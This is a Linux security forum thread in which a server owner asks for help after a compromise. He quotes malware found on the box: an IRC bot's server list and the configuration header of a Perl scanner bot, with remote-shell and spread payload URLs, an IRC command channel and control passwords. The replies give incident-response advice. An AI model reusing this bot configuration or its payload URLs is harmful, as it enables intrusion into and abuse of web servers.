Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I have big problem. I have server at ThePlanet and in last several days (maybe weeks) I sometime see in bandwith graph that link of 10mb/s is 100% used, see http://img144.imageshack.us/img144/9...gimgphpvi3.png
Than I see in var/tmp and find some bad code, maybe script in which are some hacker email addresses and some IPs. In some file I see and some IRC script and on net find that script is for IRC download or some similary.
connectionmethod direct
server 72.20.54.69 9000
server 194.169.192.55 9000
server 71.6.216.111 9000
server 72.20.54.69 31967
server 72.20.54.69 27397
server 72.20.54.69 48618
server 72.20.54.69 55493
server 71.6.216.111 65267
Too and some other files, example begining of one:
Quote:
#!/usr/bin/perl
#####################################################################################
## ##
## ##
## 04/04/2008 ##
## Author : Osirys ##
## Team : Third Eye Security ##
## Ircd : 84.19.176.186 ##
## WebSite : ##
## Contact : osirys[at]live[dot]it ##
## ##
## ## IMPORTANT ## ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
## # SYSTEM MORE SECURE. ##
## ## ##
## ##
## Release: v5 Private ##
## I coded this tool only for fun , anyway it works well ! This is a Private ##
## Release, so if you have this Script, please, take care, and don't give it ##
## anyone ! Thank you. ##
## It's a IrcBot. So, after connecting on your Ircd, you can scan for RFI, ##
## LFI, SQL Injection on sites using dorks. ##
## Anyway, u may know, that this one is the better bot ever created ! ##
## Be happy ! ##
## ##
## Features: ##
## [+]Sql Injection Scanner ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Security Mode to protect "dangerous" functions ##
## [+]Spread Mode, to activate or disable Spread Function ##
## [+]Bypass Engines ON: Google, Yahoo ##
## !: To "bypass" these engines, the Scanner just looks for websites on other ##
## engines that use the same bots than the main ones ##
## ##
## ##
#####################################################################################
### !!_/ PRIVATE
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $id = "http://rawcraft.info/spread.txt??"; #Your RFI Response
my $shell = "http://r99.li/r57.txt??"; #Shell printed on the Vulnerable Site
my $ircd = "irc.indoirc.net";
my $port = "6667";
my $chan1 = "#fntsze.biz"; #Chan for Scan
my $chan2 = ""; #bot will be printed here too
my $nick="fntsze[".int(rand(1000))."]"; # Scanner Nickname
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://rawcraft.info/t.txt???";
my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 1; #0 ->disabled, 1 ->enabled
my $killpwd = "fuckoff"; #Password to Kill the Bot
my $chidpwd = "fuckoff"; #Password to change the RFI Response
my $cmdpwd = "fuckoff"; #Password to execute commands on the server
my $secpwd = "fuckoff";
my $spreadpwd = "fuckoff";
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
First you have to put your own tools onto the server - and they need to be set up so that they do not use any system tools or libraries. Basically, the safest thing are static-linked tools. You may also look at installing a 'rootkit' checking program; have it write a report and you can retrieve the report via 'scp' or something. The report will help you find out what nasties have been put on. Then you need to find out what software was compromised and allowed the lowlife to get into your system. The next step is to write a script to repair all that you can in 1 go - it needs to start out by shutting down all non-essential services; (of course ssh must continue to run - which could be difficult if it's a r00t version). You need a script to do it all (and using your 'clean' tools) or else the lowlife might actually be logged on at the time and see what you're doing. I guess somewhere in the 'var' directory will be a good place to hide; the lowlife might me monitoring for changes in the usual executable directories like /bin.
Looking at those scripts, I suspect your server is being used to serve up web pages that inject scripts - send someone an IM or an email with a "this is a funny link!" leading to your web page and their Outlook or MSN Messenger is instantly screwed.
Actually the first thing to do is do nothing on the server. If you want to do something then the first step is to get acquainted with the Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...checklist.html.
Quote:
Originally Posted by pinniped
put your own tools onto the server
Here you're contradicting yourself with your installation instructions: see the argument you use at "You need a script to do it all". The next step would be gathering available information and that doesn't need installing anything right now: copy the system and daemon logs, login database, password files and full output of listing network connections, process information and open files off the box. Because the OP didn't provide all the necessary nfo, anything beyond that is unnecessary guesswork, speculation.
Quote:
Originally Posted by pinniped
write a script to repair all that you can
I'd also like to point out that at this stage the OP should never ever be confronted with "solutions", and especially not the idea that things are "repairable". IMNSHO that is bad practice: please do not offer that kind of "advice" again. If you want to know what my angle is try reading some incident handling threads in this forum and recaps like http://www.linuxquestions.org/questi...14#post2291514 and http://www.linuxquestions.org/questi...64#post3206764.
One friend tell me that is IRC BOT and that is run from perl.
No anything into error_log file, too nothing into access_log, but have logs into /var/tmp/.something in which are some attempts of login, but that attempts are ago 2-3-4 days, and problems still isnt solved. Now I rename all files from /tmp/var and add into iptables ports which use IRC (from 6667-6700) and reboot server, but still problem isnt solved. I run rkhunter but no infections founded.
How I to find which is that perl process and how to kill it, remove from my server?
Yes, the first is part of a DCC bot and the second a RFI (Remote File Inclusion) scanner. Looking at the other nfo you forgot to post here, that exploit code you found relates to this CVE vulnerability (yes, you read that right: 2006). What concerns me more is the fact you acknowledge you haven't been vigilant, you haven't been updating the machine, and you haven't secured the machine and then still think you don't have to learn from your mistakes and still could
Quote:
Originally Posted by mladja04
"hope that isnt very compromised and try to clean it on this way"
. Please stop thinking about still serving things. Web log, forum, CMS, games, whatever you run on the machine it isn't important anymore and whatever runs should be killed. If you think that's rough then ask ThePlanet right now to do a clean install and get it over with.
I suggest you do the following things:
- read post #4, the part about the CERT link, and act on it,
- copy system and daemon logs, login database, password files and a full output of listing network connections, process information and open files off the box,
- raise your firewall so only traffic from and to your management IP gets through,
- stop all services you don't need like Apache, MySQL, any perl or PHP processes but keep remote access like SSH open but only for your IP,
- run a RPM package verification on all packages and save the log off-site,
- investigate the logs you copied and copy details here. If it's too much tarball them up, upload to some free hoster and post the URI here.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.